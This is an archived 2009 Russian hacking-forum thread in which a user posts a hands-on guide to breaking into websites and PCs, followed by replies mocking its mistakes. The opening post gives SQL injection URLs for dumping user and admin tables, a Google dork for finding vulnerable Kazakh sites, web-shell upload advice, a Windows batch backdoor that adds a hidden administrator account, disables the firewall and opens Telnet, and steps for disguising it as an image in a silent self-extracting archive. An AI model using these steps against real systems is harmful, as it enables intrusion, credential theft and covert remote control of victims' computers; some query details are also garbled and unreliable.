Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Описание нескольких методов взлома

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Форум №6] >> Описание нескольких методов взлома
Имя
Сообщение << Старые топики   Новые топики >>
Описание нескольких методов взлома - 2009-08-05 22:04:21.226666   
coolziro

Сообщений: 158
Оценки: 0
Присоединился: 2009-02-28 17:51:42.486666
Здравствуйте.
Сейчас я расскажу о приемах взлома серверов, компьютеров, mail адресов.
Методы взлома сервера:
SQL – injection
Один из распространённых способов взлома сайтов и программ, работающих с базами данных, основанный на внедрении в запрос произвольного SQL-кода.
Атака типа внедрения SQL может быть возможна из-за некорректной обработки входящих данных, используемых в SQL-запросах.

Пример

$id = $_REQUEST['id'];
$res = mysql_query("SELECT * FROM news WHERE id_news = $id");

http://example.org/script.php?id=5

ставим кавычку

http://example.org/script.php?id=5`

Если она не фильтруется то выйдет ошибка:

(Warning: mysql(): supplied argument is not a valid MySQL result resource in)

Далее идет вычисление полей в таблице с помощью параметра ORDER BY

http://example.org/script.php?id=5+ORDER+BY+ предполагаемое количество полей –

Предположим полей 7 из них 3 выводятся на сайте.

http://example.org/script.php?id=-5+ORDER+BY+1,2,3,4,5,6,7–

Выводятся поля 3, 5. Узнаем версию базы MySQL с помощью version()

http://example.org/script.php?id=-5+ORDER+…sion(),4,5,6,7—

На сайте в 3м поле будет написана версия базы. Предположим это 5 версия.

Во всех версиях выше 4 ой есть универсальные таблицы INFORMATION_SCHEMA.TABLES и поле TABLE_NAME.
INFORMATION_SCHEMA.COLUMNS и поле COLUMN_NAME


http://example.org/script.php?id=-5+ORDER+BY+1,2, TABLE_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES—

Теперь в 3м поле выдут все таблицы которые находятся в базе.

http://example.org/script.php?id=-5+ORDER+…SCHEMA.COLUMNS—

Все колонки находящиеся в таблицах.

Далее находим таблицу например users и поле например user_name, user_pass, user_email, user_mobile, user_address

Составляем запрос

http://example.org/script.php?id=-5+ORDER+…6,7+FROM+users—

И в 3м поле выходит полная информация о пользователе. Параметр user_pass то есть пароль пользователя выйдет в зашифрованном виде (алгаритм md5 чаще всего) 446f9bce9cd9e51771f60b6e9a12108b после расшифровки пароль примет следующий вид предположим 123923993838.
Остальные поля понятны.
То же самое и с таблицей admin, только пароль после расшифровки можно использовать для авторизации к сайту как администратор. Чаще всего админки сайтов лежат по адресу http://example.org/admin/ или /administrator/

Имея доступ к адмике сайта можно использовать уязвимость типо PHP – injection
То есть залить на сервер шелл.( спец php скрипт дающий полный доступ к серверу и хостингу в общем, тое есть если на сервере находиться не один сайт а 50 – 100 то с его помощью можно получить доступ к редактированию всех сайтов и управлении операционной системы сервера) на пример r57shell или c99madshell.

Найти подобную уязвимость на сайтах не трудно нужно всего лишь ввести в google.com
запрос: inurl:news.php?id=5 site:kz Warning: mysql

По запросу выйдет очень много уязвимых сайтов находящихся в Казахстане.

Взлом компьютера.
Есть очень много способов, но я расскажу об универсальном, с его помощью можно будет получить полный доступ к компьютеру вплоть до подключения к рабочему столу.

Для начала создается спец файл и который маскируется под архив и и методом соц. Инженерии “впаривается” через любой доступный метод на компьютер “жертвы”
После того как архив закачен на компьютер и открыт запускается BAT файл который открывает доступ к компьютеру через telnet. Зная IP адрес уязвимой машины можно проникнуть в него и скачать любой файл. При этом вирусная опасность будет нулевая!
Пример
.bat файл

chcp 1251
net user coolz 12333 /add
net localgroup Администраторы coolz /add
net localgroup Administrators coolz /add
net stop sharedaccess
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet

Создается отдельный пользователь в системе coolz и задается пароль 12333
Далее присваиваются права администратора. И открывается порт 972.

За тем выбираешь файл который нужно “впарить” пусть это будет картинка 1.jpg

Выбирается картинка и пакуется в sfx архив, далее выделяете картинку (1.exe в архиве) и “батник” (1.bat)
нажимаешь добавить в архив. Ставишь галку создать SFX архив потом нажимаешь во вкладку дополнительно и выбираешь пара
метры SFX
Путь для распаковки пишешь: %WinDir%\temp
В окошке выполнять после распаковки
пишем наш архив с картинкой. 1.exe
Заводим во вкладку режимы выбираем скрыть все нажимаем ок
Теперь заходим во вкладку комментарий
И где написано ввести комментарий вручную После строчки SavePath добавляем Setup=cool.bat
Внешний вид

Path=%WinDir%\temp
SavePath
Setup=cool.bat
Setup=1.exe
Silent=1

Нажимаем ОК

Все замаскированный архив с батником готов

То есть после того как открывается архив выполняется бат файл за тем открывается картинка

После подключения к компьютеру можно открыть доступ к удаленному управлению
Для этого в командной строке вводятся следующие параметры
chcp 1251
net localgroup Пользователи удаленного рабочего стола coolz /add
net accounts /maxpwage:unlimited
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "coolz" /t REG_DWORD /d 0 /f
net stop sharedaccess
sc config sharedaccess start= disabled
sc config tlntsvr start= auto

Все доступ открыт. Подключаемся к компьютеру с помощью Подключение к удаленному рабочему столу.
Водим логин пароль и всё. Загружается рабочий стол уязвимой машины. В дальнейшем можно загрузить сниффер и узнать все пароли. (ICQ, mail адрес и. т. д.)


О взломе ящика скажу коротко.
Есть 3 способа взлома:
1й перебор пароля по словарю
2й использование XSS уязвимости
3й соц.инженерия
Post #: 1
RE: Описание нескольких методов взлома - 2009-08-06 10:51:36.920000   
oRb

Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
quote:

ставим кавычку

http://example.org/sсriрt.php?id=5`

Если она не фильтруется то выйдет ошибка:

а если ошибка не выдастся это будет означать, что инъекции нету? оО
quote:

http://example.org/sсriрt.php?id=-5+ORDER+BY+1,2, TABLE_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES—

OMFG! И где же такой запрос выполнится?

Кстать, после "–" надо пробел ставить.

quote:

Имея доступ к адмике сайта можно использовать уязвимость типо PHP – injection
То есть залить на сервер шелл
Ничего не напутал?


Где такой бездумный говнокопипаст берете?
Post #: 2
RE: Описание нескольких методов взлома - 2009-08-06 10:56:31.356666   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
))) Похоже это не копипаст но могучий личный опыт
Post #: 3
RE: Описание нескольких методов взлома - 2009-08-06 13:18:09.756666   
coolziro

Сообщений: 158
Оценки: 0
Присоединился: 2009-02-28 17:51:42.486666

quote:


http://example.org/sсriрt.php?id=-5+ORDER+BY+1,2, TABLE_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES—

OMFG! И где же такой запрос выполнится?



Да ступил конечно ) не ORDER+BY а UNION+SELECT

quote:


Кстать, после "–" надо пробел ставить.


Хм странно но у меня и без пробелов все отлично работает.

quote:


а если ошибка не выдастся это будет означать, что инъекции нету? оО


Не написал) возможно она сляпая
quote:


http://example.org/sсriрt.php?id=-5+ORDER+BY+1,2, TABLE_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES—

OMFG! И где же такой запрос выполнится?



Да ступил конечно ) не ORDER+BY а UNION+SELECT

quote:


Кстать, после "–" надо пробел ставить.


Хм странно но у меня и без пробелов все отлично работает.

quote:


а если ошибка не выдастся это будет означать, что инъекции нету? оО


quote:


Не написал) возможно она слепая.

Имея доступ к адмике сайта можно использовать уязвимость типо PHP – injection
То есть залить на сервер шелл
Ничего не напутал?


Честно говоря не понял, что ты имел в виду, хочешь сказать нет?
Post #: 4
RE: Описание нескольких методов взлома - 2009-08-06 13:22:14.963333   
coolziro

Сообщений: 158
Оценки: 0
Присоединился: 2009-02-28 17:51:42.486666
Тут почти все рукопись)
Post #: 5
RE: Описание нескольких методов взлома - 2009-08-06 22:13:11.316666   
Оптимизатор

Сообщений: 881
Оценки: 0
Присоединился: 2007-06-23 08:23:03.333333
щя лопну от смеха ;)
Post #: 6
RE: Описание нескольких методов взлома - 2009-08-06 22:22:32.110000   
S00pY

Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
Я такого бреда ещё не читал.
[sm=ak.gif][sm=ak.gif][sm=ak.gif][sm=ak.gif]
Post #: 7
RE: Описание нескольких методов взлома - 2009-08-06 22:31:32.990000   
coolziro

Сообщений: 158
Оценки: 0
Присоединился: 2009-02-28 17:51:42.486666
quote:


щя лопну от смеха


А ты отойди и лопнись :D :D :D

quote:


Я такого бреда ещё не читал.


По читай на досуге может чему научишься8|
Post #: 8
Страниц:  [1]
Все форумы >> [Форум №6] >> Описание нескольких методов взлома







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.